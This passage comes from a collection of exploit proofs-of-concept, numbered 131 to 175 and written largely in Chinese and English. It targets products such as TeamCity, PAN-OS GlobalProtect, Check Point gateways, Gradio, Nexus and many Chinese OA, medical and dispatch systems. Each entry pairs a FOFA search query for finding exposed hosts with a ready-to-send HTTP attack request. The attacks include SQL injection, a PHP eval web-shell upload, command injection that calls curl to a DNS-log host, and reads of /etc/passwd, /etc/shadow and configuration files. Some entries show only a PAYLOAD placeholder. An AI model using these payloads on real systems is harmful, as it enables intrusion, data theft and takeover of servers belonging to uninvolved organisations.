User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017: SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199:
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall: file upload via file.php
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway: SQL injection via index.php
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway: SQL injection via list_ipAddressPolicy.php
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat: SSRF via the /api/cors endpoint
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform: SQL injection via down_file.php
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform: SQL injection via pwd_update.php
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform: SQL injection via editemedia.php
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform: SQL injection via get_extension_yl.php
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform: SQL injection via ajax_users.php
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform: weak default credentials
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin

143. Netis WF2780 v2.1.40144: remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link: command injection via nas_sharing.cgi
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the (base64-encoded) command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect: command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo: unauthenticated remote code execution via thumb.php
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4: path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP: authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard: remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0: authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1: SQL injection via pageList
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster: remote command execution
CVE-2024-1212
Affected versions:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio: arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform: SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage): arbitrary file upload via file.php
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is reachable at the path echoed in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特 CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file contents, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
